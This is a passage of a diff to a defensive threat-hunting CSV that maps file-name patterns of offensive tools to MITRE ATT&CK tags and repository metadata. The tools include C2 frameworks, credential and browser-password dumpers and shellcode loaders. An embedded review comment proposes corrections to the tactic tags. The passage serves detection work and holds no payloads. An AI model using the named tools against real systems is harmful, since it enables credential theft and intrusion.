T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" "*/goDoH.git*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*/godoh/*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*/GoFetch.git*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" 
@@ -3704,35 +3719,37 @@ "*/GONET-Scanner/*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*/goPassGen.git*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*/gopher-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/gophish.db*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" -"*/gophish/*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*/gophish.db*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*/gophish/*","offensive_tool_keyword","gophish","Open-Source 
Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" "*/gorsair.go*","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" -"*/go-secdump.git*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*/go-secdump.git*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" "*/gosecretsdump*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/Gotato.git*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*/gotato.go*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*/goZulipC2.git*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" -"*/GPOddity.git*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*/GPOddity/*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*/GPOddity.git*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*/GPOddity/*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM 
relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*/gpp_autologin.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/gpp_password.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/gpp-decrypt*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/gpsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/GreatSCT/*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/GreatSCT/GreatSCT*","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/greatsct-output*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"*/Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*/Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*/GruntHTTP.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/gtfobins.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/GruntHTTP.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/gtfobins.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/gtfobins.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" -"*/guervild/BOFs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/guervild/BOFs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/guessed_emails.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "*/gyaansastra/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" -"*/GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*/GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*/h8mail/*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" -"*/HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*/HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" "*/hackerid.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*/hackingtool.git*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" -"*/Hack-Tools.git*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*/hackingtool.git*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*/Hack-Tools.git*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" "*/Hades.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*/hades.git*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - 
T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/HadesLdr.git*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" 
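Review bot: The two added NetExec rows (`*/gpp_autologin.py*` and `*/gpp_password.py*`) are categorised "Credential Access", yet their tactics column lists only `TA0007 - TA0003 - TA0002 - TA0001` and their techniques column omits the Group Policy Preferences sub-technique, so filtering or reporting by tactic will miss them. I would change those two fields on both rows to `"T1552.006 - T1069 - T1021 - T1136 - T1018","TA0006 - TA0007 - TA0003 - TA0002 - TA0001"`. Both rows also carry severity 10 and enable proxy detection on a bare file-name match. The same module names appear to exist in CrackMapExec (worth confirming against both repositories), so `metadata_comment` could read `module file name shared with CrackMapExec - confirm the tool before triage` instead of `N/A`. The `*/handlekatz.py*` row added in the next hunk has the same missing `TA0006`.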
@@ -3743,24 +3760,26 @@ "*/hadoop-secondary-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-tasktracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Hak5.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*/hakrawler.git*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*/hakrawler.git*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web 
Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" "*/hancitor.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/handlekatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/HandleKatz_BOF*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","93","17","2021-10-12T21:38:02Z","2021-10-12T18:45:06Z" "*/HarmJ0y*","offensive_tool_keyword","Github Username","Co-founder of Empire. BloodHound. and the Veil-Framework | PowerSploit developer | krb lover | Microsoft PowerShell MVP | Security at the misfortune of others","N/A","N/A","N/A","N/A","POST Exploitation 